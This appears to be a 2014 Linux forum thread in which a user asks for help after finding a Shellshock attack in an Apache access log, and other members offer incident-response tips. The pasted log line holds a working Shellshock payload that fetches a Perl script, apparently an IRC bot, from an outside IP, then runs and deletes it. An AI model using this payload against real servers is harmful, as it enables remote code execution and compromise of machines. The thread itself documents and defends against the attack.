Ubuntu 14.04 + Apache2

mimu88 · 09-29-2014, 04:30 PM

Hello.
For testing i have tried running an apache server on ubuntu 14.04.
This morning the machine was freezed. It didn't response on pings or keyboard inputs. After a reboot i found this in the apache access log:

Code:

173.45.100.18 - - [29/Sep/2014:04:14:05 +0200] "GET /cgi-bin/hi HTTP/1.0" 403 376 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /
tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""

How can I find out, what the pearl script has done and what do I have to do now? I have stopped the machine. Can I find out, what the attack has done and if it has influenced other machines on the lan?

Thanks

unSpawn · 09-30-2014, 01:01 AM

Next time run any "tests" behind a firewall and properly hardened. Also rebooting removes volatile information. Always try to see if the screen shows information and if you can try to log in over SSH or any Out of Bounds method (if any). Questions:
0) Did you update your machine (see https://www.linuxquestions.org/quest...-a-4175519975/) before this or any other anomalous entry occurred?
1) The Perl IRC bot is similar to the one mentioned in https://www.linuxquestions.org/quest...gs-4175520443/.
2) If it ran you should find the file as "/tmp/ji". Tell us if it's there.

mimu88 · 09-30-2014, 03:10 AM

Hello unSpawn.
Thank you for your reply.

The machine was not reachable, no responses on pings, no way to connect over ssh, the screen was only showing the normal login text. No reaction on keyboard inputs.

I updated the machine a few days before this happened.
The /tmp folder is empty. cd /tmp + ls -la:

insgesamt 16
drwxrwxrwt 4 root root 4096 set 30 10:01 .
drwxr-xr-x 25 root root 4096 set 3 15:42 ..
drwxrwxrwt 2 root root 4096 set 30 10:01 .ICE-unix
drwxrwxrwt 2 root root 4096 set 30 10:01 .X11-unix

Habitual · 09-30-2014, 04:12 AM

have a look through http://www.linuxquestions.org/questi...ogs-4175520321

I just went through this.

mimu88 · 09-30-2014, 05:55 AM

Now I have updated my system. https://www.digitalocean.com/communi...-vulnerability

How can I check, if the attack has modified something, if the script is active and/or if the hacker has access?

Habitual · 09-30-2014, 07:16 AM

https://www.linuxquestions.org/quest...5/#post5246805

mimu88 · 09-30-2014, 08:43 AM

atd isn't installed on my machine.
CGI isn't enabled on apache.

apache2ctl -M says.
Loaded Modules:
core_module (static)
so_module (static)
watchdog_module (static)
http_module (static)
log_config_module (static)
logio_module (static)
version_module (static)
unixd_module (static)
access_compat_module (shared)
alias_module (shared)
auth_basic_module (shared)
authn_core_module (shared)
authn_file_module (shared)
authz_core_module (shared)
authz_host_module (shared)
authz_user_module (shared)
autoindex_module (shared)
deflate_module (shared)
dir_module (shared)
env_module (shared)
filter_module (shared)
mime_module (shared)
mpm_prefork_module (shared)
negotiation_module (shared)
php5_module (shared)
setenvif_module (shared)
status_module (shared)

Habitual · 09-30-2014, 09:04 AM

Install logwatch